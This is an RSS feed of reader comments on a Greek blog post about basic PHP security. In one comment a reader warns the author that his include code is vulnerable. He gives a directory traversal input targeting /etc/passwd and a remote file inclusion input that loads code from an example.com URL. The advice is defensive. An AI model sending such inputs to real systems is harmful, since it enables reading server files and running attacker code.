<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Securing PhP, τα βασικά</title>
	<atom:link href="http://humanworks.gr/php/securing-php-%cf%84%ce%b1-%ce%b2%ce%b1%cf%83%ce%b9%ce%ba%ce%ac/feed/" rel="self" type="application/rss+xml" />
	<link>http://humanworks.gr/php/securing-php-%cf%84%ce%b1-%ce%b2%ce%b1%cf%83%ce%b9%ce%ba%ce%ac/</link>
	<description></description>
	<lastBuildDate>Tue, 27 Dec 2011 22:15:00 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>By: Securing PhP, μέρος 2 &#187; HumanWorks - SEO and Web development</title>
		<link>http://humanworks.gr/php/securing-php-%cf%84%ce%b1-%ce%b2%ce%b1%cf%83%ce%b9%ce%ba%ce%ac/comment-page-1/#comment-392</link>
		<dc:creator>Securing PhP, μέρος 2 &#187; HumanWorks - SEO and Web development</dc:creator>
		<pubDate>Tue, 07 Jul 2009 06:25:49 +0000</pubDate>
		<guid isPermaLink="false">http://humanworks.gr/?p=140#comment-392</guid>
		<description>[...] με PhP, και έτσι είπα να επανέλθω με ακόμα ένα άρθρο για php security. Ως γνωστόν η ασφάλεια είναι ένα απο τα σημαντικότερα [...]</description>
		<content:encoded><![CDATA[<p>[...] με PhP, και έτσι είπα να επανέλθω με ακόμα ένα άρθρο για php security. Ως γνωστόν η ασφάλεια είναι ένα απο τα σημαντικότερα [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: ale3andro</title>
		<link>http://humanworks.gr/php/securing-php-%cf%84%ce%b1-%ce%b2%ce%b1%cf%83%ce%b9%ce%ba%ce%ac/comment-page-1/#comment-79</link>
		<dc:creator>ale3andro</dc:creator>
		<pubDate>Wed, 26 Nov 2008 21:02:51 +0000</pubDate>
		<guid isPermaLink="false">http://humanworks.gr/?p=140#comment-79</guid>
		<description>Πολύ χρήσιμο άρθρο... Μπήκες και στοn δικό μου reader</description>
		<content:encoded><![CDATA[<p>Πολύ χρήσιμο άρθρο&#8230; Μπήκες και στοn δικό μου reader</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Νίκος Παπανώτας</title>
		<link>http://humanworks.gr/php/securing-php-%cf%84%ce%b1-%ce%b2%ce%b1%cf%83%ce%b9%ce%ba%ce%ac/comment-page-1/#comment-74</link>
		<dc:creator>Νίκος Παπανώτας</dc:creator>
		<pubDate>Mon, 24 Nov 2008 19:54:00 +0000</pubDate>
		<guid isPermaLink="false">http://humanworks.gr/?p=140#comment-74</guid>
		<description>@Tsevdos thanks, αλλα μήν νομίζεις οτι είμαι κανένας guru. Απλά μετά απο τις αμέτρητες επιθέσεις έμαθα και δύο πραγματάκια....

@axel, πολύ σωστός. Αυτό δέν σκέφτηκα να το γράψω γιατι σε όλα τα site έχω safe mode, οπότε δέν γίνεται κάποιος να παίξει σε directory έξω απο το site.
ΥΓ2: Είμαστε σειρά; Σου στέλνω email</description>
		<content:encoded><![CDATA[<p>@Tsevdos thanks, αλλα μήν νομίζεις οτι είμαι κανένας guru. Απλά μετά απο τις αμέτρητες επιθέσεις έμαθα και δύο πραγματάκια&#8230;.</p>
<p>@axel, πολύ σωστός. Αυτό δέν σκέφτηκα να το γράψω γιατι σε όλα τα site έχω safe mode, οπότε δέν γίνεται κάποιος να παίξει σε directory έξω απο το site.<br />
ΥΓ2: Είμαστε σειρά; Σου στέλνω email</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: axel</title>
		<link>http://humanworks.gr/php/securing-php-%cf%84%ce%b1-%ce%b2%ce%b1%cf%83%ce%b9%ce%ba%ce%ac/comment-page-1/#comment-72</link>
		<dc:creator>axel</dc:creator>
		<pubDate>Mon, 24 Nov 2008 15:56:49 +0000</pubDate>
		<guid isPermaLink="false">http://humanworks.gr/?p=140#comment-72</guid>
		<description>Hey Νίκο.

Ένα σχόλιο σχετικά με τα File System Attacks που αναφέρεις. Ακόμα και με τον κώδικα που αναφέρεις δεν είσαι ασφαλής.

1ον. Είσαι ανοιχτός σε directory traversals. Η διαδρομή που θα μπορούσε κάποιος να ζητήσει στο include σου θα είναι action=../../etc/passwd Τη συνέχεια την καταλαβαίνεις.
2ον. Καλύτερα κάνε disable την allow_url_fopen. Διαφορετικά ο κακός της υπόθεσης μπορεί να χρησιμοποιήσει κάτι σαν action=http://www.example.com/hack_nikos.txt?

ΥΓ: Στείλε μου email.
ΥΓ2: 301-Δ07 ;)</description>
		<content:encoded><![CDATA[<p>Hey Νίκο.</p>
<p>Ένα σχόλιο σχετικά με τα File System Attacks που αναφέρεις. Ακόμα και με τον κώδικα που αναφέρεις δεν είσαι ασφαλής.</p>
<p>1ον. Είσαι ανοιχτός σε directory traversals. Η διαδρομή που θα μπορούσε κάποιος να ζητήσει στο include σου θα είναι action=../../etc/passwd Τη συνέχεια την καταλαβαίνεις.<br />
2ον. Καλύτερα κάνε disable την allow_url_fopen. Διαφορετικά ο κακός της υπόθεσης μπορεί να χρησιμοποιήσει κάτι σαν action=http://www.example.com/hack_nikos.txt?</p>
<p>ΥΓ: Στείλε μου email.<br />
ΥΓ2: 301-Δ07 <img src='http://humanworks.gr/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
	<item>
		<title>By: John Tsevdos</title>
		<link>http://humanworks.gr/php/securing-php-%cf%84%ce%b1-%ce%b2%ce%b1%cf%83%ce%b9%ce%ba%ce%ac/comment-page-1/#comment-71</link>
		<dc:creator>John Tsevdos</dc:creator>
		<pubDate>Mon, 24 Nov 2008 15:46:22 +0000</pubDate>
		<guid isPermaLink="false">http://humanworks.gr/?p=140#comment-71</guid>
		<description>Πολύ δυνατό άρθρο αγαπητέ, συγχαρητήρια. Είσαι ήδη στον RSS feed μου ;-)</description>
		<content:encoded><![CDATA[<p>Πολύ δυνατό άρθρο αγαπητέ, συγχαρητήρια. Είσαι ήδη στον RSS feed μου <img src='http://humanworks.gr/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
</channel>
</rss>

